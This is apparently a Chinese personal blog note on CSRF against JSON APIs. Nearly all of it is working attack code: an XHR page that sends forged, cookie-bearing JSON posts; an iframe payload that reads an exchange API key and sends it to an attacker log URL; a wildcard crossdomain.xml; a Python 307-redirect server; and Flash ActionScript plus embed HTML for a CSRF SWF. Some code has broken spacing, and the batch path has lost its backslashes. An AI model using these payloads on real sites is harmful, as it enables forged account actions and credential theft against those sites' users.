之前遇到提交json的请求想要进行csrf攻击都是用的闭合表单的方法,很笨很麻烦,
这次看到了别人的操作记录一下.
这里用到了ajax异步请求(但是这里我有个疑问就是:这里用到了cors跨域,是不是必须服务器端也支持cors且又配置错误的情况才可以用此方法?待验证)
<html>
<body>
<script>
function submitRequest() {
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://www.xxx.com/webnet/edit", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
xhr.setRequestHeader("Content-Type", "application/json; charset=utf-8");
xhr.withCredentials = true; //带上cookie
xhr.send(JSON.stringify({"pSpotId":"120201","pSignTimes":"70","pModuleID":"207","pSceneid":"120201007000046"})); }
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();"/>
</form>
</body>
</html>
看到别人还有用flash文件来进行攻击的情况,也记录下
https://www.freebuf.com/articles/web/155189.html
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://btc-exchange/api/requestApiKey',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='//atttacker.net/log?key='+this.responseText;
};
</script>’></iframe>
2018.12.1 对flash csrf的补充如下---------------------------------------------------------------分割线-----------------------------------------------------------------------
https://blog.csdn.net/Lee_Natuo/article/details/83749809
这个时候有两种情况,flash文件上传在目标站点还是攻击者自己的站点,如果是目标站点,则需要在攻击者站点上配置crossdomain XML文件:
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>
流程:
1.在本地先创建一个服务器端,可以用python(目标站点:http://victim-site/userdelete),通过命令“python pyserver.py”运行Web服务器
import BaseHTTPServer
import time
import sys
HOST= '127.0.0.1'
PORT= 8000
classRedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_POST(s):
if s.path == '/csrf.swf':
s.send_response(200)
s.send_header("Content-Type","application/x-shockwave-flash")
s.end_headers()
s.wfile.write(open("csrf.swf","rb").read())
return
s.send_response(307)
s.send_header("Location","http://victim-site/userdelete")
s.end_headers()
def do_GET(s):
print(s.path)
s.do_POST()
if__name__ == '__main__':
server_class = BaseHTTPServer.HTTPServer
httpd = server_class((HOST,PORT),RedirectHandler)
print time.asctime(),"Server Starts -%s:%s" % (HOST,PORT)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print time.asctime(),"Server Stops -%s:%s" % (HOST,PORT)
2.创建csrf.swf文件
1)创建一个包含下列ActionScript代码的text文件,文件名为csrf.as
package
{
import flash.display.Sprite;
import flash.net.URLLoader;
import flash.net.URLRequest;
import flash.net.URLRequestHeader;
import flash.net.URLRequestMethod;
public class csrf extends Sprite
{
public function csrf()
{
super();
var member1:Object = null;
var myJson:String = null;
member1 = new Object();
member1 = {
"acctnum":"100",
"confirm":"true"
};
var myData:Object = member1;
myJson = JSON.stringify(myData);
myJson = JSON.stringify(myData);
var url:String ="http://attacker-ip:8000/";
var request:URLRequest = new URLRequest(url);
request.requestHeaders.push(new URLRequestHeader("Content- Type","application/json"));
request.data = myJson;
request.method = URLRequestMethod.POST;
var urlLoader:URLLoader = new URLLoader();
try
{
urlLoader.load(request);
return;
}
catch(e:Error)
{
trace(e);
return;
}
}
}
}
2)获取托管Flash文件的主机系统(攻击者的服务器)IP地址/域名,并替换掉代码中的<attacker-ip> 上面用的127.0.0.1
3)运行“mxmlc csrf.as”命令,将该文件编译为csrf.swf
这里编译的时候有些坑,第一个时不能使用64位的jre,所以我又下载了32位的jvm,但是配置jvm.config的时候出错了
于是干脆用的批处理,在flex_sdk下的bin目录下创建bat文件,内容如下:
"%JAVA_HOME%injava.exe" -Xmx384m -Dsun.io.useCanonCaches=false -jar "%~dp0..libmxmlc.jar" +flexlib="%~dp0..frameworks" %*
最后用这个bat来编译as代码成swf文件
4)最后只需加载swf文件即可,可以使用如下代码在html中加载swf文件
<embed style="RIGHT: 10px; POSITION: absolute; TOP: 10px" align=center
src=127.0.0.1/csrf.swf
width="1024" height="580 "
type=application/x-shockwave-flash wmode="transparent" quality="high" ;>
</embed>
上面的情况和XSCH (Cross Site Content Hijacking)可翻译为跨站内容劫持有些细节上的区别,详情http://wiki.secbug.net/web_xsch.html